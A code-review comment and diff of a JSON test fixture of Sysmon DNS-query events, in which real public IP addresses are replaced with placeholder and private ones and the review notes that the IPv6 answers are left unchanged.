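Review bot: The IPv6 entries `"2001:503:a83e::2:30"`, `"2001:503:231d::2:30"`, `"2001:503:83eb::30"` and `"2001:500:856e::30"` are left as unchanged context lines in `dns.resolved_ip` while the neighbouring IPv4 values are rewritten to `89.160.20.156` and `192.168.x.30`; these IPv6 values are not in a documentation or ULA prefix, so they appear to be the same kind of real public address the commit is removing. If the supported subset includes IPv6 addresses they should be replaced here too, and the same context lines recur in the hunks at -5868, -6090, -6115, -6339 and -6365 and in the `QueryResults` text of the corresponding `event.original` values. If the policy intentionally covers only IPv4, a short comment on the test input config explaining why the IPv6 answers stay would save the next reviewer the same question.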
@@ -5868,21 +5789,21 @@ "tpc.googlesyndication.com" ], "ip": [ - "172.217.10.1", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313809333Z", + "ingested": "2021-12-09T13:49:44.739351200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:172.217.10.1;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program 
Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802466200Z'/\u003e\u003cEventRecordID\u003e110\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.146\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etpc.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead-googlehosted.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -5983,7 +5904,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-10-14T04:10:32.313811083Z", + "ingested": "2021-12-09T13:49:44.739357200Z", "code": "1", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e1\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e1\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:38.011477000Z'/\u003e\u003cEventRecordID\u003e4\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:37.964\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ce01-5c8f-0000-00102c412a00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e5028\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\wbem\\unsecapp.exe\u003c/Data\u003e\u003cData Name='FileVersion'\u003e6.3.9600.16384 (winblue_rtm.130821-1623)\u003c/Data\u003e\u003cData Name='Description'\u003eSink to receive asynchronous callbacks for WMI client application\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='CommandLine'\u003eC:\\Windows\\system32\\wbem\\unsecapp.exe -Embedding\u003c/Data\u003e\u003cData Name='CurrentDirectory'\u003eC:\\Windows\\system32\\\u003c/Data\u003e\u003cData Name='User'\u003eNT 
AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='LogonGuid'\u003e{42f11c3b-6e1a-5c8c-0000-0020e7030000}\u003c/Data\u003e\u003cData Name='LogonId'\u003e0x3e7\u003c/Data\u003e\u003cData Name='TerminalSessionId'\u003e0\u003c/Data\u003e\u003cData Name='IntegrityLevel'\u003eSystem\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=6DF8163A6320B80B60733F9D62E2F39B4B16B678\u003c/Data\u003e\u003cData Name='ParentProcessGuid'\u003e{42f11c3b-6e1b-5c8c-0000-00102f610000}\u003c/Data\u003e\u003cData Name='ParentProcessId'\u003e560\u003c/Data\u003e\u003cData Name='ParentImage'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='ParentCommandLine'\u003eC:\\Windows\\system32\\svchost.exe -k DcomLaunch\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -6053,11 +5974,11 @@ "type": "CNAME" }, { - "data": "162.248.19.147", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -6065,7 +5986,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -6073,7 +5994,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -6081,7 +6002,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -6090,14 +6011,14 @@ } ], "resolved_ip": [ - "162.248.19.147", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, 
@@ -6115,21 +6036,21 @@ "image2.pubmatic.com" ], "ip": [ - "162.248.19.147", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313812396Z", + "ingested": "2021-12-09T13:49:44.739360800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:162.248.19.147;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802480600Z'/\u003e\u003cEventRecordID\u003e111\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.182\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimage2.pubmatic.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pug44000nfc.pubmatic.com;type: 5 pug44000nf.pubmatic.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", 
@@ -6201,12 +6122,12 @@ "type": "CNAME" }, { - "data": "204.79.197.203", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "network": { 
@@ -6224,13 +6145,13 @@ "sam.msn.com" ], "ip": [ - "204.79.197.203" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313813720Z", + "ingested": "2021-12-09T13:49:44.739364600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:204.79.197.203;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802496100Z'/\u003e\u003cEventRecordID\u003e112\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.183\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esam.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 www.msn.com;type: 5 www-msn-com.a-0003.a-msedge.net;type: 5 a-0003.a-msedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6290,23 +6211,23 @@ }, "answers": [ { - "data": "52.85.89.250", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.85.89.94", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.85.89.22", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.85.89.139", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -6314,7 +6235,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -6322,7 +6243,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -6330,7 +6251,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -6339,17 +6260,17 @@ } ], "resolved_ip": [ - "52.85.89.250", - "52.85.89.94", - "52.85.89.22", - "52.85.89.139", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, 
@@ -6365,24 +6286,21 @@ "ocsp.sca1b.amazontrust.com" ], "ip": [ - "52.85.89.250", - "52.85.89.94", - "52.85.89.22", - "52.85.89.139", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313814992Z", + "ingested": "2021-12-09T13:49:44.739368Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:52.85.89.250;::ffff:52.85.89.94;::ffff:52.85.89.22;::ffff:52.85.89.139;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802516200Z'/\u003e\u003cEventRecordID\u003e113\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.222\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.sca1b.amazontrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6450,17 +6368,17 @@ "type": "CNAME" }, { - "data": "185.167.164.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "185.167.164.42", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "185.167.164.43", - "185.167.164.42" + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -6477,14 +6395,13 @@ "c1.adform.net" ], "ip": [ - "185.167.164.43", - "185.167.164.42" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313816258Z", + "ingested": "2021-12-09T13:49:44.739372700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:185.167.164.43;::ffff:185.167.164.42;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802540200Z'/\u003e\u003cEventRecordID\u003e114\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.271\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec1.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track.adformnet.akadns.net;type: 5 track-us.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -6552,11 +6469,11 @@ "type": "CNAME" }, { - "data": "40.84.140.84", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -6564,7 +6481,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { 
@@ -6572,17 +6489,17 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" } ], "resolved_ip": [ - "40.84.140.84", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "network": { 
@@ -6599,18 +6516,18 @@ "urs.microsoft.com" ], "ip": [ - "40.84.140.84", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30" + "192.168.92.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313817515Z", + "ingested": "2021-12-09T13:49:44.739377900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802550800Z'/\u003e\u003cEventRecordID\u003e115\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution 